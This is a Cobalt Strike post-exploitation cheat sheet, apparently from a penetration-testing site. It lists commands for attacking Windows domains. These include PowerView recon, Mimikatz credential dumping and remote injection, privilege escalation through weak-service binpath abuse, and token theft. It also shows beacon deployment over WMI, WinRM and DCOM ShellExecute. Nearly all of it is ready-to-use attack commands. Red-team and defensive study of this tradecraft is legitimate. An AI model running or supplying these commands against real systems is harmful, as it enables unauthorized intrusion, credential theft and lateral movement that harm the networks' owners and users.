CobaltStrike Cheat Sheet 

User Integrity Context Methods:

 

Determine Integrity Mode:

  • whoami /groups

  • getuid

Locate User High-Integrity Access on Host(s):

  • powershell-import /root/cobaltstrike/scripts/PowerSploit/Recon/PowerView.ps1

  • powershell Invoke-FindLocalAdminAccess 

Determine High-Integrity on Remote Host(s):

  • shell dir \\[host]\c$   -- If denied then no!

Obtain High-Integrity on Remote Host(s):

  • net use \\[Host]\c$ /user:[domain]\[usr] [pwsd]

  • spawnas [domain]\[usr] [pswd]

  • make-token [domain]\[usr] [pswd]

Identify Domain Controllers:

  • net dclist   -- Lists all DC's in beacon's domain

  • shell net view /DOMAIN   -- List the name of the domain

  • shell nltest /dclist:[domain]   -- Lists DC in the beacon domain

    • x64 beacon:  shell c:\windows\sysnative\nltest /dclist​

  • shell nslookup [dc-host-name]   -- Lists DC IP​

Misc TTP's:

Locate Sensitive Information:

  • powershell-import /root/cobaltstrike/scripts/PowerSploit/Recon/PowerView.ps1

  • powershell Invoke-ShareFinder

Using Mimikatz to Suspend Services:

  • Locate PID of Services to Suspend

  • mimikatz process::suspend [svc-PID]

  • mimikatz process::resume [svc-PID]

Mimikatz Dump Cached Creds:

  • mimikatz !lsadump::cache   -- Note:  hashcat format:  2100 ;   hash output format:  hash:username

Integrity Context Theft Methods:

 

Locate Privsec Opportunities:

  • powershell-import /root/cobaltstrike/artifact/PowerSploit/Privesc/PowerUp.ps1

  • powershell Invoke-AllChecks 

    • Identify Opportunities...​

Weak Service Abuses:

  • Copy Svc name (to temp.txt)    --  Invoke-AllChecks

  • Windows EXE (s) | Windows Service |  SMB beacon

  • cd c:\users\[usr]    -- path with r/w/x access

  • upload [/path/2/svc.exe]

  • shell sc config [Weak-svc] binpath= c:\users\[usr]\[scv.exe]

  • shell sc stop [Weak-svc]  -- wait till signal stopped!

  • shell sc start [Weak-svc]   -- wait 5-10 sec.

  • link [parent-beacon]   -- (e.g. 127.0.0.1, thunder, dc01, etc...) 

Token Theft (req * beacon):

  • ps   -- list process, locate high-integrity PID

  • steal_token [pid]

    • perform action(s) w/i beacon

  • rev2self   -- reverts to prior user context

WMI Methods:

  • Deploy Beacon:

    • wmic /user:"domain\username" /password:"mypasssword" /node:192.168.1.1 process call create “cmd.exe /c ps1liner-text”

WinRM (Remote PS Mgt) Methods:

  • Look for port 5985 !!   -- WinRM default port

  • Deploy Beacon

    • powershell Invoke-Command -ComputerName [Tgt-host] -ScriptBlock { paste ps1liner or cmd here... }  -- Note:  Braces in Scriptblock are require to contain cmd

  • Inject MimiKatz:​​​

    • powershell-import /root/cobaltstrike/scripts/PowerSploit/Exfiltration/Invoke-Mimikatz.ps1
                powershell Invoke-Mimikatz -ComputerName [Tgt-host]   --  Note:  Ensure hashes / Creds are listed in CBS | Creds or manually add as needed

.Net Remote Code Execution Method (via PS):

  • Set User Context on Remote Host:

    • ​PS> runas /netonly /user:domain\username "powershell.exe"

  • Execute Code on Remote Host (from PS> prompt):

    • ​$com = [Type]::GetTypeFromCLSID('C08AFD90-F2A1-11D1-8455-00A0C91F3880',"192.168.1.1")

    • $obj = [System.Activator]::CreateInstance($com)

    • $obj.Document.Application.ShellExecute("cmd.exe","/c ps1liner",$null,0)

Pentest-Zen (ExitC0de00c.com)